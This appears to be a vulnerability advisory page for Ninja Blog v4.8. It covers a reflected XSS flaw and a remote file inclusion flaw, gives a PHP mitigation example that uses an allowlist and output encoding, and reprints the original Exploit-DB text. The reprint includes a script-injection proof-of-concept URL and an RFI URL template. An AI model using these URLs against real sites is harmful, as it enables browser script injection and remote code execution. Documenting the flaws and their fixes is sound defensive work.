Vendor: Ninja Blog
By: indoushka
CVSS: 8.8 (HIGH)
Vulnerability Type: XSS and RFI
CWE: 79 (XSS) and 98 (RFI)
Product Name: Ninja Blog
Affected Version From: 4.8
Affected Version To: 4.8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
Date: 2009

Ninja Blog v4.8 Multiple Vulnerabilities

Ninja Blog v4.8 is vulnerable to XSS and RFI attacks. An attacker can inject malicious JavaScript into the vulnerable parameter of the index.php page (in the published proof of concept, the path appended after index.php), and it is executed in the victim's browser when the reflected value is rendered unencoded. An attacker can also inject a malicious URL into the vulnerable page parameter of entries/index.php; because the value is passed to a file-inclusion call, the application fetches and executes the remote file on the server (remote file inclusion, CWE-98).

Mitigation:

Input validation should be used to prevent XSS and RFI attacks. All user-supplied input should be validated and filtered before being used in the application.
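The following is an added example of the mitigation described above, written for this page; it is not Ninja Blog's code. It assumes the application loads sub-pages from a local pages/ directory based on a `page` request parameter (as in the advisory's entries/index.php?page=... URL) and that it reflects parts of the request URI into HTML. The page names in the allowlist are placeholders.

```php
<?php
// Added example (not Ninja Blog code): a hardened page-include handler and an
// output-encoding helper, covering the two defects the advisory names.
// Assumptions: pages live as PHP files under ./pages/ and the request
// parameter is "page". Page names below are illustrative placeholders.

declare(strict_types=1);

// Allowlist of page names the application knows about. Anything not in this
// list is rejected, so a client-supplied URL or path is never handed to
// include()/require(). This is the RFI fix.
const ALLOWED_PAGES = ['home', 'archive', 'about'];

/**
 * Resolve the requested page name to a local file path, or return null if it
 * is not on the allowlist. The check is an exact string match; no attempt is
 * made to filter out "http://", "../" or null bytes, because denylisting is
 * exactly what file-inclusion payloads are built to bypass.
 */
function resolvePage(?string $requested): ?string
{
    $name = $requested ?? 'home';
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $name . '.php';
}

/**
 * Encode untrusted text for insertion into HTML element content or a
 * double-quoted attribute value. This is the XSS fix: the reflected value
 * can no longer close a tag or open a <script> element.
 */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- request handling ---
$target = resolvePage($_GET['page'] ?? null);
if ($target === null) {
    http_response_code(404);
    // The rejected value is echoed encoded, never raw, so the error page
    // itself cannot become an XSS sink.
    echo '<p>Unknown page: ' . h((string) ($_GET['page'] ?? '')) . '</p>';
    exit;
}

// PATH_INFO (the "/..." appended after index.php) and the request URI are
// also attacker-controlled; if they are reflected anywhere, such as a
// self-referencing link, encode them the same way.
$self = h($_SERVER['REQUEST_URI'] ?? '/');
echo '<a href="' . $self . '">this page</a>';

require $target;
```

As defence in depth, keep `allow_url_include=Off` in php.ini (the default in modern PHP); with that setting, `include` of an http:// or ftp:// URL fails even if an allowlist check is later bypassed or forgotten.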
Source

Exploit-DB raw data:

========================================================================================
| # Title    : Ninja Blog v4.8 Multiple Vulnerabilities
| # Author   : indoushka
| # email    : indoushka@hotmail.com
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Total alerts found : 2
|                High  : 1
|              Medium  : 1
|                  Low :
|       Informational  :
| # Web Site : www.iq-ty.com
| # Dork     : Powered by Ninja Designs This is a port of WordPress
| # Tested on: Windows SP2 French V.(Pnx2 2.0) + Linux French v.(9.4 Ubuntu)
| # Bug      : Multi
======================      Exploit By indoushka       =================================
 # Exploit  :

 1- XSS

http://server/ninjablog4.8/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

 2- RFI

http://server/ninjablog4.8/entries/index.php?page=[EV!L]

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------